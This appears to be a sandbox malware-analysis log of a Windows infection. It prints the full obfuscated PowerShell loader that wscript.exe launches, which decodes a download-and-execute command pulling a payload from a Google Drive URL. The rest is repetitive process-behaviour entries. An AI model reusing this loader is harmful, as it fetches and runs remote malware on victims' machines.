              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedyJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB9AAF5205 push eax; ret 4_2_00007FFB9AAF5251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB9ABC79FE push ds; ret 4_2_00007FFB9ABC79FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_045642D7 push ebx; ret 13_2_045642DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_045662E0 push esp; ret 13_2_045662F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04560E70 push esi; retf 0002h13_2_04560E7A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0456D4DF pushad ; ret 13_2_0456D4E1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0456D78C pushfd ; ret 13_2_0456D78D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_073FCF5C push eax; iretd 13_2_073FCF5D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
